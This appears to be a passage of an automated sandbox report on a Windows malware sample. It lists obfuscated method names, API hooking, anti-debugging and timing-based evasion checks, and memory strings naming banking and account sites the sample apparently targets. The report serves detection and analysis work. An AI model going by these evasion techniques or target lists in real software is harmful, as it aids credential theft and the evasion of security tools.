                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, KK8pTEomlWy1IxU7rPV.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fSUxy3ubwE', 'xldx2SYXeS', 'N7qxBQGEy2', 'jhExI5Kq1O', 'P3Lx4A98hu', 'XYrxTDpXnj', 'kWbx1agVTC'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, vmjSMHLnf0WgVXAKwy.cs | High entropy of concatenated method names: 'WOWQjy30ID', 'iHMQO9ScyB', 'J0toEVYXHq', 'i65oDs8jva', 'yJpQyBBS0T', 'GflQ2f78XD', 'rThQBSsqSA', 's8qQIrnThK', 'xj7Q4sYAeW', 'o2hQTahOD4'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, YguAtk6ZmoepowUBfe.cs | High entropy of concatenated method names: 'GONGInt7d8', 'Sj6G4B77oq', 'edPGTKe15H', 'gyfG1cJip2', 'fvTGYgEvuV', 'sELGMSWG1P', 'XUGGJiGl4w', 'GJtGjm2IV9', 'xAqGFLNqit', 'Xt9GOLC5Wy'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, Q18JAfooaqrrDMdYmYr.cs | High entropy of concatenated method names: 'roGxOHdCg8', 'q8GxzxfQZZ', 'R2pNEZCfLp', 'Cx8NDjnKpU', 'm8NNXYWZD3', 'EqMNpTQHIj', 'CRONPJmmhn', 'BsENhEKdXC', 'FOPNgfpd9y', 'sKDNGDdwEp'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, VeTyqQgBNI31QGaTKK.cs | High entropy of concatenated method names: 'hWNeh0wqZn', 'WgHeG0BidB', 'QGOe83TNEg', 'fhEeunRwqb', 'IMOeZb6wsN', 'ptc8YCBY8V', 'MFr8MiBqY2', 'yRL8J4NIPj', 'UEl8jcqBtv', 'cUi8FgkeEp'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, FtXGmbeELiHFnvy850.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NSsXFA2lP2', 'zvUXOdCcaj', 'nikXz2eDmA', 'lHLpEv1llw', 'HuPpDhVlU2', 'fMipXjB28F', 'B1mppdmfy3', 'GDwpb8f8lGtE1ntQoMI'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CE2MNrTjHvdux83PQW.cs | High entropy of concatenated method names: 'ToString', 'fchmye6Lbt', 'wa5mH7FpKB', 'O6FmwFYEiy', 'lvemqhq4QG', 'mFIm03rbj9', 'FFRmkYQwh3', 'X6kmVu1EZS', 'bQbmS2WPAq', 'T9BmiTxEGJ'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, AougmqrpMYXVtcExiY.cs | High entropy of concatenated method names: 'MibCawtrse', 'y6bC2axoe7', 'VQBCIN9JtT', 'W9wC4UINcU', 'FlxCHgoNQ3', 'nMgCwaYDD3', 'XfuCqKAq8V', 'NuyC057b30', 'XQWCkJWco1', 'he6CVNATBx'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, EGK1BNQm4iFF7NFmNV.cs | High entropy of concatenated method names: 'u4FnKLpvXn', 'FvGnrItgHh', 'NhknsUkuPr', 'mEjnHTEksK', 'XAQnq3Kpqa', 'sgnn0fye5Y', 'BhqnV5oXBv', 'rlcnSvFse2', 'EQ9nahL8hb', 'VoqnylDbJ6'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, gMjrZWo5BQEndI0iuW5.cs | High entropy of concatenated method names: 'ToString', 'e5ENKRr2Ru', 'o3VNrsrcg4', 'CtjNlG77m1', 'iXONsyGeOJ', 'eTwNHSvBlD', 'wWCNwwvIgI', 'E8mNq1wrYW', 'bjPpAcGNnWLAdLvFtCg', 'zl4OYkG9MtD8cUVIcOs'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, DFalVoo0M1miFDNwUhY.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bEYvc9ruXL', 'JFivxBX5l1', 'TV3vNOlFOP', 'rWGvvAlDF3', 'i38vfxLTdU', 'yYwvWGx6TF', 'NuZvdtXbKO'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, nhrSIiMtXvnmU0knkr.cs | High entropy of concatenated method names: 'hLDcsjr5BM', 'ekFcHiBr9Y', 'NCdcwLliLJ', 'wD8cq6V6SZ', 'Morc0gwJ0o', 'tlXckc3Swq', 'LJCcVNMg5N', 'ChicS52AKO', 'dO3ci7guH3', 'CXqca49PTh'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, eKlQLyzhrMev4X0GVl.cs | High entropy of concatenated method names: 'kE9xbHcfrc', 'sCBxKKFjXX', 'ELExr7t9Mm', 'TvhxsARc6c', 'xn7xHEfFne', 'auexqLtDyy', 'tPLx0hNMGu', 'hunxdZuKGC', 'gbUxtjt4eu', 'aT3x7RCGUi'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, i6b2f5VpRRZl8rOsns.cs | High entropy of concatenated method names: 'txxugaRCju', 'MsKu6lgihn', 'YYpue4Qpe4', 'b9xeOeiOKY', 'mAmezhy1eS', 'mmIuElUsUJ', 'EetuDiu74P', 'Op3uXT82wQ', 'WjuupJJva4', 'jxpuPmDCDC'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, zAfDHb3gGaQkWEOLnQ.cs | High entropy of concatenated method names: 't2But9ofRc', 'aDCu7cK7P0', 'bTDuRZiuhw', 'rwnu5UuNEd', 'jZEu3jMuWK', 'gdkubmyF25', 'xDfuLTxc1k', 'qebuKbl4cf', 'i21urVItPD', 'BHaulSK9R8'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, DZeJXG5R0ckqsgV7rJ.cs | High entropy of concatenated method names: 'DEER1lTmg', 'lKN5WunFJ', 'OwRbR8BN9', 'EZOLSq4hS', 'UrsrQ3RnT', 'YZ7lqdPcC', 'YYpJnb98a93W5BSlSx', 'maKCvfPDlXuOhubwSA', 'oFZo6iZDN', 'YtwxhsBGY'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, DgR6ixlGCWQDCNLRsT.cs | High entropy of concatenated method names: 'Dispose', 'DjjDFfZNS1', 'YZgXHJtejL', 'b4CvYghHWq', 'hinDOSaJqu', 'jOhDzIAJUy', 'ProcessDialogKey', 'lhaXEDijto', 'WijXDdfW8i', 'LtGXXXRi6U'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, LTC2WObMSVwwNqtFNN.cs | High entropy of concatenated method names: 'Imy65w5v8S', 'stZ6b8ITbg', 'ApT6KEiQ39', 'VR66rc8Bcq', 'DoP6CK9Eig', 'Yjd6mYteyy', 'NPV6Q7Gx9M', 'woo6oBiuUW', 'YZm6c7Qtue', 'cmQ6xwKmL8'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CXux7G8Bf9KDYHKbCO.cs | High entropy of concatenated method names: 'CvlphJJsN0', 'TBepgr6CJa', 'V1ypGqDpNY', 'KGTp6ZHfcC', 'K0xp8H560t', 'g4tpeXf7Jo', 'Un9puMBJIW', 'KI8pZtwltG', 'Rs2p9uHgQ9', 'TGXpAQFAGv'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, UtluiP0sBolXRu9pZR.cs | High entropy of concatenated method names: 'YQ1Du6ihdo', 'NSDDZTCy3Q', 'H9KDA4GMRD', 'rWoDUpCsDs', 'BIFDCGFHRM', 'wQNDmUQjvP', 'XGN2l5xtVc5tTGNyiv', 'OeWVcQAMBEP0q8kQw6', 'aQNDDdIgoc', 'BWlDpPyI1s'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, CJPigY2gYYha6NjUBm.cs | High entropy of concatenated method names: 'hCbQAcJ4Ah', 'YItQUvMmCr', 'ToString', 'awsQgiq9x7', 'BBnQG58G2i', 'FGOQ6rLooA', 'xC5Q8ow2CD', 'iv9Qe2VFaT', 'B0UQuvrb8a', 'svGQZd4KGK'
                Source: 0.2.ungziped_file.exe.7280000.5.raw.unpack, aN7McCEUAw0ywPhnX7.cs | High entropy of concatenated method names: 'lNWcC11CJQ', 'ksgcQWfQZD', 'XdyccoYRYn', 'JIgcNP1t9K', 'u8ncfEDxLM', 'aMLcdI7wUX', 'Dispose', 'F39ogvvARK', 'caWoGofitN', 'cppo6g4w7S'

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\ungziped_file.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: Yara match; File source: Process Memory Space: ungziped_file.exe PID: 6292, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFD3122D324
                Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFD3122D7E4
                Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFD3122D944
                Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFD3122D504
                Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFD3122D544
                Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFD3122D1E4
                Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFD31230154
                Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFD3122DA44
                Source: C:\Users\user\Desktop\ungziped_file.exe; Memory allocated: EB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ungziped_file.exe; Memory allocated: 2B80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ungziped_file.exe; Memory allocated: 2A00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ungziped_file.exe; Memory allocated: 8C60000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ungziped_file.exe; Memory allocated: 9C60000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ungziped_file.exe; Memory allocated: 9E60000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ungziped_file.exe; Memory allocated: AE60000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0122096E rdtsc 5_2_0122096E
                Source: C:\Users\user\Desktop\ungziped_file.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4158
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 907
                Source: C:\Windows\SysWOW64\SndVol.exe; Window / User API: threadDelayed 2774
                Source: C:\Windows\SysWOW64\SndVol.exe; Window / User API: threadDelayed 7200
                Source: C:\Users\user\Desktop\ungziped_file.exe; API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\SndVol.exe; API coverage: 2.8 %
                Source: C:\Users\user\Desktop\ungziped_file.exe TID: 6364; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004; Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7028; Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 5080; Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2524; Thread sleep count: 2774 > 30
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2524; Thread sleep time: -5548000s >= -30000s
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2524; Thread sleep count: 7200 > 30
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2524; Thread sleep time: -14400000s >= -30000s
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe TID: 4108; Thread sleep time: -55000s >= -30000s
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe TID: 4108; Thread sleep count: 33 > 30
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe TID: 4108; Thread sleep time: -49500s >= -30000s
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe TID: 4108; Thread sleep count: 32 > 30
                Source: C:\Program Files (x86)\wOuqNpHqAhMxaBocDsBcpkiHREWqtXbcFirowQwNnhXDcRxuWFBgBkneVMdJtArzLuc\K1A8707LwM6.exe TID: 4108; Thread sleep time: -32000s >= -30000s
                Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Last function: Thread delayed
                Source: C:\Windows\SysWOW64\SndVol.exe; Last function: Thread delayed
                Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 16_2_032BC7E0 FindFirstFileW,FindNextFileW,FindClose, 16_2_032BC7E0
                Source: C:\Users\user\Desktop\ungziped_file.exe; Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                Source: 31mF3HIk-.16.dr; Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: 31mF3HIk-.16.dr; Binary or memory string: tasks.office.comVMware20,11696501413o
                Source: 31mF3HIk-.16.dr; Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: 31mF3HIk-.16.dr; Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: 31mF3HIk-.16.dr; Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: 31mF3HIk-.16.dr; Binary or memory string: dev.azure.comVMware20,11696501413j
                Source: svchost.exe, 00000007.00000002.2868612649.0000023C0782B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWp
                Source: 31mF3HIk-.16.dr; Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: svchost.exe, 00000007.00000002.2869204656.0000023C08C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2868639197.0000023C07840000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                Source: 31mF3HIk-.16.dr; Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: 31mF3HIk-.16.dr; Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: 31mF3HIk-.16.dr; Binary or memory string: bankofamerica.comVMware20,11696501413x
                Source: 31mF3HIk-.16.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: 31mF3HIk-.16.dr; Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: 31mF3HIk-.16.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: 31mF3HIk-.16.dr; Binary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: SndVol.exe, 00000010.00000002.3510287029.000000000353A000.00000004.00000020.00020000.00000000.sdmp, K1A8707LwM6.exe, 00000011.00000002.3511776628.0000000001099000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000002.1703149829.000002690B3CD000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 31mF3HIk-.16.dr; Binary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: 31mF3HIk-.16.dr; Binary or memory string: outlook.office.comVMware20,11696501413s
                Source: 31mF3HIk-.16.dr; Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: 31mF3HIk-.16.dr; Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: 31mF3HIk-.16.dr; Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: 31mF3HIk-.16.dr; Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: 31mF3HIk-.16.dr; Binary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: 31mF3HIk-.16.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: 31mF3HIk-.16.dr; Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: 31mF3HIk-.16.dr; Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: 31mF3HIk-.16.dr; Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: 31mF3HIk-.16.dr; Binary or memory string: global block list test formVMware20,11696501413
                Source: 31mF3HIk-.16.dr; Binary or memory string: outlook.office365.comVMware20,11696501413t
                Source: ungziped_file.exe, 00000000.00000002.1065145964.0000000000D55000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}u
                Source: 31mF3HIk-.16.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: 31mF3HIk-.16.dr; Binary or memory string: interactiveuserers.comVMware20,11696501413
                Source: 31mF3HIk-.16.dr; Binary or memory string: discord.comVMware20,11696501413f
                Source: 31mF3HIk-.16.dr; Binary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\ungziped_file.exe; Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\ungziped_file.exe; Process queried: DebugPort
                Source: C:\Windows\SysWOW64\SndVol.exe; Process queried: DebugPort
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0122096E rdtsc 5_2_0122096E
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_00417D93 LdrLoadDll, 5_2_00417D93
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01210124 mov eax, dword ptr fs:[00000030h] 5_2_01210124
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0128A118 mov ecx, dword ptr fs:[00000030h] 5_2_0128A118
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0128A118 mov eax, dword ptr fs:[00000030h] 5_2_0128A118
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012A0115 mov eax, dword ptr fs:[00000030h] 5_2_012A0115
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E6154 mov eax, dword ptr fs:[00000030h] 5_2_011E6154
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011DC156 mov eax, dword ptr fs:[00000030h] 5_2_011DC156
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01274144 mov eax, dword ptr fs:[00000030h] 5_2_01274144
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01274144 mov ecx, dword ptr fs:[00000030h] 5_2_01274144
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01274144 mov eax, dword ptr fs:[00000030h] 5_2_01274144
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01278158 mov eax, dword ptr fs:[00000030h] 5_2_01278158
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011DA197 mov eax, dword ptr fs:[00000030h] 5_2_011DA197
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0129C188 mov eax, dword ptr fs:[00000030h] 5_2_0129C188
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01220185 mov eax, dword ptr fs:[00000030h] 5_2_01220185
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01284180 mov eax, dword ptr fs:[00000030h] 5_2_01284180
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0126019F mov eax, dword ptr fs:[00000030h] 5_2_0126019F
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012B61E5 mov eax, dword ptr fs:[00000030h] 5_2_012B61E5
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012101F8 mov eax, dword ptr fs:[00000030h] 5_2_012101F8
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012A61C3 mov eax, dword ptr fs:[00000030h] 5_2_012A61C3
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0125E1D0 mov eax, dword ptr fs:[00000030h] 5_2_0125E1D0
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0125E1D0 mov ecx, dword ptr fs:[00000030h] 5_2_0125E1D0
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0125E1D0 mov eax, dword ptr fs:[00000030h] 5_2_0125E1D0
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011FE016 mov eax, dword ptr fs:[00000030h] 5_2_011FE016
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01276030 mov eax, dword ptr fs:[00000030h] 5_2_01276030
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01264000 mov ecx, dword ptr fs:[00000030h] 5_2_01264000
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01282000 mov eax, dword ptr fs:[00000030h] 5_2_01282000
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011DA020 mov eax, dword ptr fs:[00000030h] 5_2_011DA020
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011DC020 mov eax, dword ptr fs:[00000030h] 5_2_011DC020
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_011E2050 mov eax, dword ptr fs:[00000030h] 5_2_011E2050
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_0120C073 mov eax, dword ptr fs:[00000030h] 5_2_0120C073
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_01266050 mov eax, dword ptr fs:[00000030h] 5_2_01266050
                Source: C:\Users\user\Desktop\ungziped_file.exe; Code function: 5_2_012780A8 mov eax, dword ptr fs:[00000030h] 5_2_012780A8
